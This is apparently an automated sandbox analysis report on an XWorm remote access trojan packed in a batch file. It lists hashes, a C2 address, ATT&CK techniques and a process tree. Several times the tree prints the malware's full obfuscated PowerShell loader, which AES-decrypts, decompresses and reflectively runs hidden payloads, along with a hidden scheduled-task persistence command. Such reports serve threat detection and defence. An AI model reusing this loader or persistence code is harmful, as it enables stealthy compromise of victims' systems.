xworm | 888b6ce9498a1425df0701fdc73c99c255684ec192db6290e16bb4c82da8656e

Analysis

max time kernel
111s
max time network
110s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
15/06/2024, 18:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

binded.bat
Size

1.1MB
MD5

4fcc4a79a40b5d4eda4116d6296dc607
SHA1

4f140172d00f5a40eb9c0f07b166cfc2111f0d71
SHA256

888b6ce9498a1425df0701fdc73c99c255684ec192db6290e16bb4c82da8656e
SHA512

2614afb3e2f7f5501246d79c7871710d0048ebacc69e517766709fdcb56e858c27deb4ed0fe1eab46f8175033446fb2f720fb43ff161552986d31dd4a8e0ccc1
SSDEEP

24576:vVq7sFq6XgPKd2wM6RcN9vz4vO21SCKesDu8a1KZ/4hvXQ:vxlR6QBsxb/4C

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

37.114.46.114:5555

Mutex

ybJkzY88U2SuCjEV

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3560-399-0x000002586A1C0000-0x000002586A1CE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3560	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3560	powershell.exe
2688	powershell.exe
3744	powershell.exe
3028	powershell.exe
4920	powershell.exe
5068	powershell.exe
5048	powershell.exe
3832	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\$rundll_724_str	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4920	powershell.exe
4920	powershell.exe
4920	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
5068	powershell.exe
5068	powershell.exe
5068	powershell.exe
5048	powershell.exe
5048	powershell.exe
5048	powershell.exe
3832	powershell.exe
3832	powershell.exe
3832	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
2688	powershell.exe
2688	powershell.exe
2688	powershell.exe
3560	powershell.exe
2688	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3744	powershell.exe
3744	powershell.exe
3744	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeIncreaseQuotaPrivilege	3832	powershell.exe
Token: SeSecurityPrivilege	3832	powershell.exe
Token: SeTakeOwnershipPrivilege	3832	powershell.exe
Token: SeLoadDriverPrivilege	3832	powershell.exe
Token: SeSystemProfilePrivilege	3832	powershell.exe
Token: SeSystemtimePrivilege	3832	powershell.exe
Token: SeProfSingleProcessPrivilege	3832	powershell.exe
Token: SeIncBasePriorityPrivilege	3832	powershell.exe
Token: SeCreatePagefilePrivilege	3832	powershell.exe
Token: SeBackupPrivilege	3832	powershell.exe
Token: SeRestorePrivilege	3832	powershell.exe
Token: SeShutdownPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeSystemEnvironmentPrivilege	3832	powershell.exe
Token: SeRemoteShutdownPrivilege	3832	powershell.exe
Token: SeUndockPrivilege	3832	powershell.exe
Token: SeManageVolumePrivilege	3832	powershell.exe
Token: 33	3832	powershell.exe
Token: 34	3832	powershell.exe
Token: 35	3832	powershell.exe
Token: 36	3832	powershell.exe
Token: SeIncreaseQuotaPrivilege	3832	powershell.exe
Token: SeSecurityPrivilege	3832	powershell.exe
Token: SeTakeOwnershipPrivilege	3832	powershell.exe
Token: SeLoadDriverPrivilege	3832	powershell.exe
Token: SeSystemProfilePrivilege	3832	powershell.exe
Token: SeSystemtimePrivilege	3832	powershell.exe
Token: SeProfSingleProcessPrivilege	3832	powershell.exe
Token: SeIncBasePriorityPrivilege	3832	powershell.exe
Token: SeCreatePagefilePrivilege	3832	powershell.exe
Token: SeBackupPrivilege	3832	powershell.exe
Token: SeRestorePrivilege	3832	powershell.exe
Token: SeShutdownPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeSystemEnvironmentPrivilege	3832	powershell.exe
Token: SeRemoteShutdownPrivilege	3832	powershell.exe
Token: SeUndockPrivilege	3832	powershell.exe
Token: SeManageVolumePrivilege	3832	powershell.exe
Token: 33	3832	powershell.exe
Token: 34	3832	powershell.exe
Token: 35	3832	powershell.exe
Token: 36	3832	powershell.exe
Token: SeIncreaseQuotaPrivilege	3832	powershell.exe
Token: SeSecurityPrivilege	3832	powershell.exe
Token: SeTakeOwnershipPrivilege	3832	powershell.exe
Token: SeLoadDriverPrivilege	3832	powershell.exe
Token: SeSystemProfilePrivilege	3832	powershell.exe
Token: SeSystemtimePrivilege	3832	powershell.exe
Token: SeProfSingleProcessPrivilege	3832	powershell.exe
Token: SeIncBasePriorityPrivilege	3832	powershell.exe
Token: SeCreatePagefilePrivilege	3832	powershell.exe
Token: SeBackupPrivilege	3832	powershell.exe
Token: SeRestorePrivilege	3832	powershell.exe
Token: SeShutdownPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeSystemEnvironmentPrivilege	3832	powershell.exe
Token: SeRemoteShutdownPrivilege	3832	powershell.exe
Token: SeUndockPrivilege	3832	powershell.exe
Token: SeManageVolumePrivilege	3832	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1468 wrote to memory of 4640	1468	cmd.exe	74
PID 1468 wrote to memory of 4640	1468	cmd.exe	74
PID 1468 wrote to memory of 4920	1468	cmd.exe	75
PID 1468 wrote to memory of 4920	1468	cmd.exe	75
PID 4920 wrote to memory of 5060	4920	powershell.exe	77
PID 4920 wrote to memory of 5060	4920	powershell.exe	77
PID 5060 wrote to memory of 3236	5060	powershell.exe	79
PID 5060 wrote to memory of 3236	5060	powershell.exe	79
PID 3236 wrote to memory of 3128	3236	cmd.exe	80
PID 3236 wrote to memory of 3128	3236	cmd.exe	80
PID 3236 wrote to memory of 5068	3236	cmd.exe	81
PID 3236 wrote to memory of 5068	3236	cmd.exe	81
PID 168 wrote to memory of 3840	168	cmd.exe	86
PID 168 wrote to memory of 3840	168	cmd.exe	86
PID 168 wrote to memory of 5048	168	cmd.exe	87
PID 168 wrote to memory of 5048	168	cmd.exe	87
PID 5048 wrote to memory of 3832	5048	powershell.exe	88
PID 5048 wrote to memory of 3832	5048	powershell.exe	88
PID 5048 wrote to memory of 4928	5048	powershell.exe	90
PID 5048 wrote to memory of 4928	5048	powershell.exe	90
PID 4928 wrote to memory of 756	4928	WScript.exe	91
PID 4928 wrote to memory of 756	4928	WScript.exe	91
PID 756 wrote to memory of 4964	756	cmd.exe	93
PID 756 wrote to memory of 4964	756	cmd.exe	93
PID 756 wrote to memory of 3560	756	cmd.exe	94
PID 756 wrote to memory of 3560	756	cmd.exe	94
PID 3560 wrote to memory of 3384	3560	powershell.exe	54
PID 3560 wrote to memory of 2556	3560	powershell.exe	84
PID 3560 wrote to memory of 2748	3560	powershell.exe	47
PID 3560 wrote to memory of 1368	3560	powershell.exe	25
PID 3560 wrote to memory of 4712	3560	powershell.exe	60
PID 3560 wrote to memory of 1360	3560	powershell.exe	24
PID 3560 wrote to memory of 1752	3560	powershell.exe	32
PID 3560 wrote to memory of 2732	3560	powershell.exe	46
PID 3560 wrote to memory of 1352	3560	powershell.exe	23
PID 3560 wrote to memory of 2520	3560	powershell.exe	43
PID 3560 wrote to memory of 2512	3560	powershell.exe	42
PID 3560 wrote to memory of 2704	3560	powershell.exe	45
PID 3560 wrote to memory of 732	3560	powershell.exe	8
PID 3560 wrote to memory of 4868	3560	powershell.exe	62
PID 3560 wrote to memory of 1560	3560	powershell.exe	28
PID 3560 wrote to memory of 1904	3560	powershell.exe	36
PID 3560 wrote to memory of 1508	3560	powershell.exe	27
PID 3560 wrote to memory of 916	3560	powershell.exe	13
PID 3560 wrote to memory of 1100	3560	powershell.exe	20
PID 3560 wrote to memory of 1684	3560	powershell.exe	31
PID 3560 wrote to memory of 1092	3560	powershell.exe	19
PID 3560 wrote to memory of 1876	3560	powershell.exe	38
PID 3560 wrote to memory of 1080	3560	powershell.exe	18
PID 3560 wrote to memory of 2252	3560	powershell.exe	40
PID 3560 wrote to memory of 868	3560	powershell.exe	12
PID 3560 wrote to memory of 1852	3560	powershell.exe	35
PID 3560 wrote to memory of 2832	3560	powershell.exe	50
PID 3560 wrote to memory of 3204	3560	powershell.exe	53
PID 3560 wrote to memory of 2808	3560	powershell.exe	49
PID 3560 wrote to memory of 1620	3560	powershell.exe	30
PID 3560 wrote to memory of 4180	3560	powershell.exe	65
PID 3560 wrote to memory of 3588	3560	powershell.exe	63
PID 3560 wrote to memory of 1216	3560	powershell.exe	22
PID 3560 wrote to memory of 1408	3560	powershell.exe	26
PID 3560 wrote to memory of 816	3560	powershell.exe	11
PID 3560 wrote to memory of 1208	3560	powershell.exe	21
PID 3560 wrote to memory of 2184	3560	powershell.exe	39
PID 3560 wrote to memory of 936	3560	powershell.exe	17

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
PID:816
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  2⤵
  PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\svchost.bat" "
    3⤵
    PID:1844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0r+0kyFBt0CB4/hGdDqpXDDHp0ZFdJ2yISJo1fJ42Xw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2eU97tnvMxgKqltgo/SJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $keVus=New-Object System.IO.MemoryStream(,$param_var); $mUyJN=New-Object System.IO.MemoryStream; $kYZlL=New-Object System.IO.Compression.GZipStream($keVus, [IO.Compression.CompressionMode]::Decompress); $kYZlL.CopyTo($mUyJN); $kYZlL.Dispose(); $keVus.Dispose(); $mUyJN.Dispose(); $mUyJN.ToArray();}function execute_function($param_var,$param2_var){ $uJZpt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mEYQo=$uJZpt.EntryPoint; $mEYQo.Invoke($null, $param2_var);}$HNCvy = 'C:\Users\Admin\AppData\Local\svchost.bat';$host.UI.RawUI.WindowTitle = $HNCvy;$rjaMb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HNCvy).Split([Environment]::NewLine);foreach ($ddjCn in $rjaMb) { if ($ddjCn.StartsWith('EyTFRVkAWjarRNfpfcEu')) { $trlof=$ddjCn.Substring(20); break; }}$payloads_var=[string[]]$trlof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      4⤵
      PID:196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:2688
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$rundll_724_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$svchost_724.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3744
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$svchost_724.vbs"
        5⤵
        
        PID:2372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$svchost_724.bat" "
        6⤵
        
        PID:5032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0r+0kyFBt0CB4/hGdDqpXDDHp0ZFdJ2yISJo1fJ42Xw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2eU97tnvMxgKqltgo/SJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $keVus=New-Object System.IO.MemoryStream(,$param_var); $mUyJN=New-Object System.IO.MemoryStream; $kYZlL=New-Object System.IO.Compression.GZipStream($keVus, [IO.Compression.CompressionMode]::Decompress); $kYZlL.CopyTo($mUyJN); $kYZlL.Dispose(); $keVus.Dispose(); $mUyJN.Dispose(); $mUyJN.ToArray();}function execute_function($param_var,$param2_var){ $uJZpt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mEYQo=$uJZpt.EntryPoint; $mEYQo.Invoke($null, $param2_var);}$HNCvy = 'C:\Users\Admin\AppData\Roaming\$svchost_724.bat';$host.UI.RawUI.WindowTitle = $HNCvy;$rjaMb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HNCvy).Split([Environment]::NewLine);foreach ($ddjCn in $rjaMb) { if ($ddjCn.StartsWith('EyTFRVkAWjarRNfpfcEu')) { $trlof=$ddjCn.Substring(20); break; }}$payloads_var=[string[]]$trlof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        7⤵
        
        PID:4128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:868

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:916

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:492

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:936

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1092

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1208

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1352

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1368

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1508

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1560

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1588

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1684

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1784

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1876

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2184

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2504

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2520

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2704

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2808

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2832

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3204

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\binded.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ubDdfc++dGnZOierWx4nOy1eVZcVDN85yhJABtnz1EQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gCMQkn589+ljXLannfa+nQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RIlPD=New-Object System.IO.MemoryStream(,$param_var); $OGgVf=New-Object System.IO.MemoryStream; $eubOA=New-Object System.IO.Compression.GZipStream($RIlPD, [IO.Compression.CompressionMode]::Decompress); $eubOA.CopyTo($OGgVf); $eubOA.Dispose(); $RIlPD.Dispose(); $OGgVf.Dispose(); $OGgVf.ToArray();}function execute_function($param_var,$param2_var){ $QwKrI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WoDJg=$QwKrI.EntryPoint; $WoDJg.Invoke($null, $param2_var);}$JMcWp = 'C:\Users\Admin\AppData\Local\Temp\binded.bat';$host.UI.RawUI.WindowTitle = $JMcWp;$AmLgz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JMcWp).Split([Environment]::NewLine);foreach ($SNfpD in $AmLgz) { if ($SNfpD.StartsWith('pMkqFCQhZNmuDPfTbxXO')) { $BtghH=$SNfpD.Substring(20); break; }}$payloads_var=[string[]]$BtghH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\AppData\Local\dllhost.bat
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5060
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\dllhost.bat""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3236
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z2xC2h+C2t+xhefZVNgrwhVd+6cW81hKA09gr+Vgl4k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJXvi7Nv9XV1R1jEsJpl9g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYNnG=New-Object System.IO.MemoryStream(,$param_var); $ddxMX=New-Object System.IO.MemoryStream; $tCHGY=New-Object System.IO.Compression.GZipStream($FYNnG, [IO.Compression.CompressionMode]::Decompress); $tCHGY.CopyTo($ddxMX); $tCHGY.Dispose(); $FYNnG.Dispose(); $ddxMX.Dispose(); $ddxMX.ToArray();}function execute_function($param_var,$param2_var){ $FpgFt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IsQVI=$FpgFt.EntryPoint; $IsQVI.Invoke($null, $param2_var);}$gzWXE = 'C:\Users\Admin\AppData\Local\dllhost.bat';$host.UI.RawUI.WindowTitle = $gzWXE;$jVKyS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gzWXE).Split([Environment]::NewLine);foreach ($MYFti in $jVKyS) { if ($MYFti.StartsWith('mDQBKkDMpSmzSJjqvWce')) { $zEoKi=$MYFti.Substring(20); break; }}$payloads_var=[string[]]$zEoKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:3128
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5068

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4712

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3588

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\conhost.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtgTNLQD917Z3OfAalN5p6ncKCNzsah2L8s5ejdS+dc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnVmcutmPup+V829XIUyUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAIzG=New-Object System.IO.MemoryStream(,$param_var); $allpB=New-Object System.IO.MemoryStream; $qQadD=New-Object System.IO.Compression.GZipStream($EAIzG, [IO.Compression.CompressionMode]::Decompress); $qQadD.CopyTo($allpB); $qQadD.Dispose(); $EAIzG.Dispose(); $allpB.Dispose(); $allpB.ToArray();}function execute_function($param_var,$param2_var){ $EsoDJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XgHWj=$EsoDJ.EntryPoint; $XgHWj.Invoke($null, $param2_var);}$MwOvg = 'C:\Users\Admin\AppData\Local\conhost.bat';$host.UI.RawUI.WindowTitle = $MwOvg;$kBJQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MwOvg).Split([Environment]::NewLine);foreach ($QatGk in $kBJQu) { if ($QatGk.StartsWith('vwDuqbmIlgDgjzMkEVvn')) { $STSYE=$QatGk.Substring(20); break; 